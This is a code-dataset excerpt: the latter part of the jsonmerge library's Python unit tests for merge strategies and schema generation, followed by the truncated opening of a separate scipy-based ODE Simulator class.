def test_anyof(self):
schema = {
'anyOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.merge([2, 3, 4], 'a')
self.assertEqual(cm.exception.value.ref, '#')
def test_anyof_overwrite_toplevel(self):
schema = {
'mergeStrategy': 'overwrite',
'anyOf': [
{
'type': 'array'
},
{
'type': 'string'
},
]
}
merger = jsonmerge.Merger(schema)
self.assertEqual(merger.merge([2, 3, 4], 'a'), 'a')
self.assertEqual(merger.merge('a', [2, 3, 4]), [2, 3, 4])
def test_custom_strategy(self):
schema = {'mergeStrategy': 'myStrategy'}
class MyStrategy(jsonmerge.strategies.Strategy):
def merge(self, walk, base, head, schema, meta, **kwargs):
if base is None:
ref = ""
else:
ref = base.ref
return JSONValue("foo", ref)
merger = jsonmerge.Merger(schema=schema,
strategies={'myStrategy': MyStrategy()})
base = None
base = merger.merge(base, {'a': 1})
self.assertEqual(base, "foo")
def test_merge_by_id(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"properties": {
"id": {"type": "string"},
"field": {"type": "number"},
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 2}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_when_key_is_empty_should_do_nothing(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"ignoreId": ""},
"items": {
"properties": {
"id": {"type": "string"},
"field": {"type": "number"},
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "", "field": ""}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_no_items(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "id"},
}
a = [
{"id": "A", "field": 1},
]
b = [
{"id": "A", "field": 2},
]
# by default, it should fall back to "replace" strategy for integers.
expected = [
{"id": "A", "field": 2},
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_simple_ref(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "key"}
}
a = [
{"key": "A", "field": 1},
]
b = [
{"key": "A", "field": 2},
]
expected = [
{"key": "A", "field": 2},
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_no_key(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
a = [
{"id": "A", "field": 1},
]
b = [
{'field': 2}
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
# it should ignore array elements that do not have the id
self.assertEqual(base, a)
def test_merge_by_id_compex_ref(self):
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "/foo/bar"},
}
a = [
{'foo': {'bar': 1}, 'baz': 1}
]
b = [
{'foo': {'bar': 2}}
]
c = [
{'foo': {'bar': 1}, 'baz': 2}
]
# by default, it should fall back to "replace" strategy for integers.
expected = [
{'foo': {'bar': 1}, 'baz': 2},
{'foo': {'bar': 2}}
]
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
base = merger.merge(base, c)
self.assertEqual(base, expected)
def test_merge_by_id_complex_id(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
a = [
{"id": ["A", {"B": "C"} ], "field": 1},
{"id": ["A", {"B": "D"} ], "field": 2},
{"id": ["A", {"B": "E"} ], "field": 3},
]
b = [
{"id": ["A", {"B": "D"} ], "field": 4},
{"id": ["E", {"B": "C"} ], "field": 5},
]
merger = jsonmerge.Merger(schema)
c = merger.merge(a, b)
expected = [
{"id": ["A", {"B": "C"} ], "field": 1},
{"id": ["A", {"B": "D"} ], "field": 4},
{"id": ["A", {"B": "E"} ], "field": 3},
{"id": ["E", {"B": "C"} ], "field": 5},
]
self.assertEqual(expected, c)
def test_merge_by_id_with_complex_array(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"properties": {
"id": {"type": "string"},
"field": {
"type": "array",
"items": {
"properties": {
"xx": {
"type": "string"
}
}
}
}
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": [{"xx": "testA1"}, {"xx": "testA2"}]},
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA4"}]}
]
}
b = {
"awards": [
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA6"}]},
{"id": "C", "field": [{"xx": "testA7"}, {"xx": "testA8"}]}
]
}
expected = {
"awards": [
{"id": "A", "field": [{"xx": "testA1"}, {"xx": "testA2"}]},
{"id": "B", "field": [{"xx": "testA3"}, {"xx": "testA6"}]},
{"id": "C", "field": [{"xx": "testA7"}, {"xx": "testA8"}]}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_with_subschema(self):
schema = {
"properties": {
"awards": {
"type": "array",
"mergeStrategy": "arrayMergeById",
"items": {
"type": "object",
"properties": {
"id": {
"type": "string"
},
"field": {
"type": "number",
"mergeStrategy": "version"
}
}
}
}
}
}
a = {
"awards": [
{"id": "A", "field": 1},
{"id": "B", "field": 2}
]
}
b = {
"awards": [
{"id": "B", "field": 3},
{"id": "C", "field": 4}
]
}
expected = {
"awards": [
{"id": "A", "field": [{"value": 1}]},
{"id": "B", "field": [{"value": 2}, {"value": 3}]},
{"id": "C", "field": [{"value": 4}]}
]
}
merger = jsonmerge.Merger(schema)
base = None
base = merger.merge(base, a)
base = merger.merge(base, b)
self.assertEqual(base, expected)
def test_merge_by_id_items_array(self):
schema = {
"mergeStrategy": "arrayMergeById",
"items": [
{},
{},
]
}
head = [
{'id': 'A'},
{'id': 'B'}
]
merger = jsonmerge.Merger(schema)
base = None
with self.assertRaises(SchemaError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/items')
def test_merge_by_id_only_integers(self):
# arrayMergeById strategy can be used to treat simple arrays of
# integers as Python sets by setting idRef to root (i.e. pointing to
# the array element itself)
#
# https://github.com/avian2/jsonmerge/issues/24
schema = {
"mergeStrategy": "arrayMergeById",
"mergeOptions": {"idRef": "/"},
}
base = [ 1, 2 ]
head = [ 2, 3 ]
expected = [ 1, 2, 3]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_bad_head_type(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = {'foo': 'bar'}
base = []
merger = jsonmerge.Merger(schema)
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_by_id_bad_base_type(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = []
base = {'foo': 'bar'}
merger = jsonmerge.Merger(schema)
with self.assertRaises(BaseInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#')
def test_merge_by_id_no_base_id(self):
schema = {
'mergeStrategy': 'arrayMergeById'
}
head = [ {'id': 'a'} ]
base = [ {} ]
merger = jsonmerge.Merger(schema)
r = merger.merge(base, head)
self.assertEqual(r, [ {}, {'id': 'a'} ])
def test_merge_by_id_non_unique_base(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a'},
{'id': 'a'}
]
head = [
{'id': 'a',
'foo': 1}
]
merger = jsonmerge.Merger(schema)
with self.assertRaises(BaseInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/1')
def test_merge_by_id_non_unique_head(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a',
'foo': 1},
]
head = [
{'id': 'a',
'foo': 2},
{'id': 'a',
'foo': 3}
]
merger = jsonmerge.Merger(schema)
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, head)
self.assertEqual(cm.exception.value.ref, '#/1')
def test_merge_by_id_order_issue_31_1(self):
# There was an issue with arrayMergeById where head value would be
# merged with the last item in the base list, not the matching item.
# The result was then assigned to the matching item.
#
# If the last item in the base list was just created in the same
# arrayMergeById (i.e. by another item in the head list), then merge
# would fail with "Unresolvable JSON pointer".
#
# https://github.com/avian2/jsonmerge/pull/31
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a', 'val': {'a': 1}},
{'id': 'b', 'val': {'b': 2}},
]
head = [
{'id': 'a', 'val': {'c': 3}}
]
expected = [
# bug would produce {'b': 2, 'c': 3} here
{'id': 'a', 'val': {'a': 1, 'c': 3}},
{'id': 'b', 'val': {'b': 2}},
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_order_issue_31_2(self):
schema = {
"mergeStrategy": "arrayMergeById",
}
base = [
{'id': 'a', 'val': {'a': 1}},
{'id': 'b', 'val': {'b': 2}},
]
head = [
# this caused "Unresolvable JSON pointer"
{'id': 'c', 'val': {'c': 3}},
{'id': 'a', 'val': {'c': 3}}
]
expected = [
{'id': 'a', 'val': {'a': 1, 'c': 3}},
{'id': 'b', 'val': {'b': 2}},
{'id': 'c', 'val': {'c': 3}}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_subclass_get_key(self):
class MyArrayMergeById(jsonmerge.strategies.ArrayMergeById):
def get_key(self, walk, item, idRef):
return item.val[-1]
schema = {'mergeStrategy': 'myArrayMergeById'}
merger = jsonmerge.Merger(schema=schema,
strategies={'myArrayMergeById': MyArrayMergeById()})
base = [
[ 'a', 'b', 'id1' ],
[ 'c', 'id2' ],
]
head = [
[ 'e', 'f', 'g', 'id3' ],
[ 'd', 'id1' ],
]
expected = [
[ 'd', 'id1' ],
[ 'c', 'id2' ],
[ 'e', 'f', 'g', 'id3' ],
]
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_multiple_ids(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'mergeOptions': { 'idRef': ['/a', '/b'] }
}
base = [
{
'a': 1,
'b': 2
},
{
'a': 1,
'b': 1,
}
]
head = [
{
'a': 1,
'b': 1,
'c': 2,
},
{
# incomplete key, ignored
'b': 1,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
expected = [
{
'a': 1,
'b': 2
},
{
'a': 1,
'b': 1,
'c': 2,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_merge_by_id_multiple_ids_ignore(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'mergeOptions': {
'idRef': ['/a', '/b'],
'ignoreId': [1, 2],
}
}
base = [
{
'a': 1,
'b': 1,
}
]
head = [
{
# ignoreId matches
'a': 1,
'b': 2,
'c': 2,
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
expected = [
{
'a': 1,
'b': 1
},
{
'a': 2,
'b': 2,
'c': 3,
}
]
merger = jsonmerge.Merger(schema)
base = merger.merge(base, head)
self.assertEqual(base, expected)
def test_append_with_maxitems(self):
schema = {
"mergeStrategy": "append",
"maxItems": 2,
}
merger = jsonmerge.Merger(schema)
head = ["a"]
base = None
base = merger.merge(base, head)
base = merger.merge(base, head)
base = merger.merge(base, head)
schema2 = merger.get_schema()
jsonschema.validate(head, schema2)
jsonschema.validate(base, schema2)
def test_append_with_unique(self):
schema = {
"mergeStrategy": "append",
"uniqueItems": True,
}
merger = jsonmerge.Merger(schema)
head = ["a"]
base = None
base = merger.merge(base, head)
base = merger.merge(base, head)
schema2 = merger.get_schema()
jsonschema.validate(head, schema2)
jsonschema.validate(base, schema2)
def test_slash_in_property_name(self):
base = {'a': 0}
head = {'b': {'c/d': 1}}
base = jsonmerge.merge(base, head)
self.assertEqual(base, {'a': 0, 'b': {'c/d': 1}})
def test_tilde_in_property_name(self):
base = {'a': 0}
head = {'~1': 1}
base = jsonmerge.merge(base, head)
self.assertEqual(base, {'a': 0, '~1': 1})
def test_discard(self):
schema = {'mergeStrategy': 'discard'}
base = "a"
base = jsonmerge.merge(base, "b", schema)
self.assertEqual(base, "a")
def test_discard_objectmerge_null(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'discard'
}
} }
base = {}
head = {'a': 1}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {})
def test_discard_arraymergebyid(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'items': {
'mergeStrategy': 'discard'
} }
base = [ {'id': 1, 'val': 1} ]
head = [ {'id': 1, 'val': 2} ]
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, [{'id': 1, 'val': 1}])
def test_discard_arraymergebyid_null(self):
schema = {
'mergeStrategy': 'arrayMergeById',
'items': {
'mergeStrategy': 'discard'
} }
base = [ ]
head = [ {'id': 1, 'val': 1} ]
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, [])
def test_discard_null_keep(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'discard',
'mergeOptions': {
'keepIfUndef': True
}
}
} }
base = {}
head = {'a': 1}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 1})
head = {'a': 2}
base = jsonmerge.merge(base, head, schema)
self.assertEqual(base, {'a': 1})
def test_bad_strategy(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'invalidStrategy'
} } }
base = {'a': 1 }
head = {'a': 2 }
with self.assertRaises(SchemaError) as cm:
jsonmerge.merge(base, head, schema)
self.assertEqual(cm.exception.value.ref, '#/properties/a')
def test_nan(self):
# float('nan') == float('nan') evaluates to false.
#
# https://github.com/avian2/jsonmerge/issues/39
base = {
"foo": 1,
"bar": float('nan')
}
head = {
"foo": 1,
"bar": float('nan')
}
base = jsonmerge.merge(base, head)
def test_merge_by_index(self):
schema = {
'mergeStrategy': 'arrayMergeByIndex'
}
base = [ {'a': 0 }, {'b': 1} ]
head = [ {'c': 2 }, {'d': 3} ]
result = jsonmerge.merge(base, head, schema)
self.assertEqual(result, [ {'a': 0, 'c': 2}, {'b': 1, 'd': 3} ])
def test_merge_by_index_empty(self):
schema = {
'mergeStrategy': 'arrayMergeByIndex'
}
base = [ ]
head = [ {'c': 2 }, {'d': 3} ]
result = jsonmerge.merge(base, head, schema)
self.assertEqual(result, [ {'c': 2}, {'d': 3} ])
class TestGetSchema(unittest.TestCase):
def test_default_overwrite(self):
schema = {'description': 'test'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'description': 'test'})
def test_default_object_merge_trivial(self):
schema = {'type': 'object'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'type': 'object'})
def test_default_object_merge(self):
schema = {
'properties': {
'foo': {
'mergeStrategy': 'version',
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'properties': {
'foo': {
'type': 'array',
'items': {
'properties': {
'value': {},
}
}
}
}
})
def test_overwrite(self):
schema = {'mergeStrategy': 'overwrite'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {})
def test_append(self):
schema = {'type': 'array',
'mergeStrategy': 'append'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {'type': 'array'})
def test_version(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {}
}
}
})
def test_version_ref_twice(self):
schema = {
'properties': {
'a': {
'$ref': '#/definitions/item'
},
'b': {
'$ref': '#/definitions/item'
},
},
'definitions': {
'item': {
'type': 'object',
'mergeStrategy': 'version'
}
}
}
expected = {
'properties': {
'a': {
'$ref': '#/definitions/item'
},
'b': {
'$ref': '#/definitions/item'
},
},
'definitions': {
'item': {
'type': 'array',
'items': {
'properties': {
'value': {
'type': 'object',
}
}
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(expected, schema2)
def test_version_meta(self):
schema = {'type': 'object',
'mergeStrategy': 'version'}
meta = {
'properties': {
'date': {},
'version': {}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema(merge_options={
'version': {'metadataSchema': meta}})
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {'type': 'object'},
'date': {},
'version': {}
}
}
})
def test_version_meta_deprecated(self):
schema = {'mergeStrategy': 'version'}
merger = jsonmerge.Merger(schema)
with warnings.catch_warnings(record=True) as w:
merger.get_schema(meta={'foo': 'bar'})
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_version_meta_in_schema(self):
schema = {
'type': 'object',
'mergeStrategy': 'version',
'mergeOptions': {
'metadataSchema': {
'properties': {
'date': {},
'version': {},
},
},
},
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {'type': 'object'},
'date': {},
'version': {}
}
}
})
def test_version_limit(self):
schema = {'mergeStrategy': 'version',
'mergeOptions': {'limit': 5}}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'type': 'array',
'items': {
'properties': {
'value': {}
}
},
'maxItems': 5
})
def test_object_merge_simple(self):
schema = {'mergeStrategy': 'objectMerge'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, {})
def test_object_merge_nested(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'foo': {'mergeStrategy': 'version'}
}}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2,
{
'properties': {
'foo': {
'type': 'array',
'items': {
'properties': {
'value': {}
}
}
}
}
})
def test_anyof_descend(self):
# We don't support descending through 'anyOf', since each branch could
# have its own rules for merging. How could we then decide which rule
# to follow?
schema = {
'anyOf': [
{'properties': {'a': {}}},
{'properties': {'b': {}}}
]
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.get_schema()
self.assertEqual(cm.exception.value.ref, '#')
def test_anyof_dont_descend(self):
# However, 'anyOf' should be fine if we don't descend through it (e.g.
# if it's after a 'overwrite' strategy for instance.
schema = {
'properties': {
'a': {
'mergeStrategy': 'overwrite',
'properties': {
'b': {
'anyOf': [
{'properties': {'c': {}}},
{'properties': {'d': {}}},
]
}
}
}
}
}
expected = {
'properties': {
'a': {
'properties': {
'b': {
'anyOf': [
{'properties': {'c': {}}},
{'properties': {'d': {}}},
]
}
}
}
}
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
def test_external_refs(self):
schema_1 = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/foo'
}
# get_schema() shouldn't do external HTTP requests for schemas.
merger = jsonmerge.Merger(schema_1)
mschema = merger.get_schema()
d = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/foo'
}
self.assertEqual(d, mschema)
def test_internal_refs(self):
schema = {
'id': 'http://example.com/schema_1.json',
'mergeStrategy': 'overwrite',
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': {
'properties': {
'baz': {}
}
}
}
}
expected = {
'id': 'http://example.com/schema_1.json',
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': {
'properties': {
'baz': {}
}
}
}
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
def test_ref_to_non_object_is_an_error(self):
schema = {
'properties': {
'foo': {
'$ref': '#/definitions/bar'
}
},
'definitions': {
'bar': []
}
}
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.get_schema()
self.assertEqual(cm.exception.value.ref, '#/properties/foo')
def test_reference_in_meta(self):
schema = {'mergeStrategy': 'version'}
meta_schema = {
'id': 'http://example.com/schema_1.json',
'$ref': 'schema_2.json#/definitions/meta'
}
schema_2 = {
'id': 'http://example.com/schema_2.json',
'definitions': {
'meta': {
'properties': {
'foo': {
'type': 'string'
},
'bar': {
'enum': [ 'a', 'b' ]
}
}
}
}
}
merger = jsonmerge.Merger(schema)
merger.cache_schema(schema_2)
mschema = merger.get_schema(merge_options={
'version': {'metadataSchema': meta_schema}})
self.assertEqual(mschema,
{
'type': 'array',
'items': {
'properties': {
'value': {},
'foo': {'type': 'string'},
'bar': {'enum': ['a', 'b'] },
}
}
})
def test_local_reference_in_meta(self):
schema = {
'properties': {
'content': {
'mergeStrategy': 'version',
'mergeOptions': {
'metadataSchema': {
'$ref': '#/definitions/metadata',
},
},
},
},
'definitions': {
'metadata': {
'properties': {
'revision': {
'type': 'number',
},
},
},
},
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(mschema, {
'properties': {
'content': {
'type': 'array',
'items': {
'properties': {
'value': {},
'revision': {
'type': 'number',
},
},
},
},
},
'definitions': {
'metadata': {
'properties': {
'revision': {
'type': 'number',
},
},
},
},
})
def test_array_in_schema(self):
schema = {
'mergeStrategy': 'overwrite',
'enum': [
"foo",
"bar",
]
}
expected = {
'enum': [
"foo",
"bar",
]
}
merger = jsonmerge.Merger(schema)
mschema = merger.get_schema()
self.assertEqual(expected, mschema)
def test_version_adds_array_type(self):
schema = {
"type": "object",
"properties": {
"buyer": {
"properties": {
"id": {
"type": "object",
"properties": {
"name": {
"type": "string",
"mergeStrategy": "version"
}
}
}
}
}
}
}
expected = {
"type": "object",
"properties": {
"buyer": {
"properties": {
"id": {
"type": "object",
"properties": {
"name": {
"type": "array",
"items": {
"properties": {
"value": {
"type": "string"
}
}
}
}
}
}
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_by_id(self):
schema = {
"mergeStrategy": "arrayMergeById",
"items": {
'type': 'object'
}
}
expected = {
"items": {
'type': 'object'
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_by_id_with_depth(self):
schema = {
"properties": {
"test": {
"mergeStrategy": "arrayMergeById",
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
}
},
"definitions": {
"refitem": {
"type": "object",
"properties": {
"field1": {
"type": "string",
"mergeStrategy": "version"
}
}
}
}
}
expected = {
"properties": {
"test": {
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
}
},
"definitions": {
"refitem": {
"type": "object",
"properties": {
"field1": {
"type": "array",
"items": {
"properties": {
"value": {
"type": "string"
}
}
}
}
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_by_id_with_depth_twice(self):
# Here were have a $ref that get_schema() should descend into twice.
schema = {
"properties": {
"test": {
"mergeStrategy": "arrayMergeById",
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
},
"test2": {
"mergeStrategy": "arrayMergeById",
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
}
},
"definitions": {
"refitem": {
"type": "object",
"properties": {
"field1": {
"type": "string",
"mergeStrategy": "version"
}
}
}
}
}
expected = {
"properties": {
"test": {
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
},
"test2": {
"type": "array",
"items": {
"$ref": "#/definitions/refitem"
}
}
},
"definitions": {
"refitem": {
"type": "object",
"properties": {
"field1": {
"type": "array",
"items": {
"properties": {
"value": {
"type": "string"
}
}
}
}
}
}
}
}
self.maxDiff = None
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_by_id_with_depth_no_ref(self):
schema = {
"properties": {
"test": {
"mergeStrategy": "arrayMergeById",
"type": "array",
"items": {
"type": "object",
"properties": {
"field1": {
"type": "string",
"mergeStrategy": "version"
}
}
}
}
}
}
expected = {
"properties": {
"test": {
"type": "array",
"items": {
"type": "object",
"properties": {
"field1": {
"type": "array",
"items": {
"properties": {
"value": {
"type": "string"
}
}
}
}
}
}
}
},
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_append_additional(self):
schema = {'mergeStrategy': 'objectMerge',
'properties': {
'b': {'mergeStrategy': 'overwrite'}
},
'additionalProperties': {
'mergeStrategy': 'append'
}}
expected = {'properties': {
'b': {},
},
'additionalProperties': {}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_merge_additional_bool(self):
schema = {'additionalProperties': True}
base = {}
head = {'a': 'a'}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, schema)
def test_oneof(self):
schema = {
'oneOf': [
{
'type': 'array',
'mergeStrategy': 'append'
},
{
'type': 'object'
}
]
}
expected = {
'oneOf': [
{
'type': 'array',
},
{
'type': 'object'
}
]
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_oneof_recursive(self):
# Schema to merge all arrays with "append" strategy and all objects
# with the default "objectMerge" strategy.
schema = {
"oneOf": [
{
"type": "array",
"mergeStrategy": "append"
},
{
"type": "object",
"additionalProperties": {
"$ref": "#"
}
},
{
"type": "string"
},
]
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, schema)
def test_oneof_toplevel(self):
schema = {
"mergeStrategy": "version",
"oneOf": [
{"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
{"type": "string", "format": "hostname"}
]
}
expected = {
"type": "array",
"items": {
"properties": {
"value": {
"oneOf": [
{"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
{"type": "string", "format": "hostname"}
]
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_anyof_toplevel(self):
schema = {
"mergeStrategy": "version",
"anyOf": [
{"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
{"type": "string", "format": "hostname"}
]
}
expected = {
"type": "array",
"items": {
"properties": {
"value": {
"anyOf": [
{"type": "string", "pattern": "^!?(?:[0-9]{1,3}\\.){3}[0-9]{1,3}(?:\\/[0-9]{1,2})?$"},
{"type": "string", "format": "hostname"}
]
}
}
}
}
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
self.assertEqual(schema2, expected)
def test_discard(self):
schema = { 'type': 'string',
'mergeStrategy': 'discard' }
merger = jsonmerge.Merger(schema)
schema2 = merger.get_schema()
expected = { 'type': 'string' }
self.assertEqual(schema2, expected)
def test_bad_strategy(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'invalidStrategy'
} } }
merger = jsonmerge.Merger(schema)
with self.assertRaises(SchemaError) as cm:
merger.get_schema()
self.assertEqual(cm.exception.value.ref, '#/properties/a')
def test_merge_by_index(self):
schema = {
'type': 'array',
'mergeStrategy': 'arrayMergeByIndex'
}
merger = jsonmerge.Merger(schema)
result = merger.get_schema()
self.assertEqual(result, {'type': 'array'})
def test_merge_by_index_name_in_exception(self):
schema = {
'properties': {
'a': {
'mergeStrategy': 'arrayMergeByIndex'
}
}
}
head = {'a': {}}
base = {'a': []}
merger = jsonmerge.Merger(schema)
with self.assertRaises(HeadInstanceError) as cm:
merger.merge(base, head)
self.assertIn('arrayMergeByIndex', str(cm.exception))
class TestExceptions(unittest.TestCase):
def test_str_with_ref(self):
e = SchemaError("Test error", JSONValue({}, '#'))
self.assertEqual(str(e), 'Test error: #')
def test_str(self):
e = SchemaError("Test error")
self.assertEqual(str(e), 'Test error')
def test_str_with_name(self):
e = SchemaError("Test error", JSONValue({}, '#'), 'test')
self.assertEqual(str(e), "'test' merge strategy: Test error: #")
if __name__ == '__main__':
unittest.main()
| avian2/jsonmerge | tests/test_jsonmerge.py | Python | mit | 69,662 |
import numpy as np
from scipy.integrate import ode
class Simulator(object):
'''
This class simulates the initial value problem that results from solving
the boundary value problem of the control system.
Parameters
----------
ff : callable
Vectorfield of the control system.
T : float
Simulation time.
u : callable
Function of the input variables.
dt : float
Time step.
'''
def __init__(self, ff, T, start, u, dt=0.01):
self.ff = ff
self.T = T
self.u = u
self.dt = dt
# this is where the solutions go
self.xt = []
self.ut = []
# time steps
self.t = []
# get the values at t=0
self.xt.append(start)
self.ut.append(self.u(0.0))
self.t.append(0.0)
#initialise our ode solver
self.solver = ode(self.rhs)
self.solver.set_initial_value(start)
self.solver.set_integrator('vode', method='adams', rtol=1e-6)
#self.solver.set_integrator('lsoda', rtol=1e-6)
#self.solver.set_integrator('dop853', rtol=1e-6)
def rhs(self, t, x):
'''
Retruns the right hand side (vector field) of the ode system.
'''
u = self.u(t)
dx = self.ff(x, u)
return dx
def calcStep(self):
'''
Calculates one step of the simulation.
'''
x = list(self.solver.integrate(self.solver.t+self.dt))
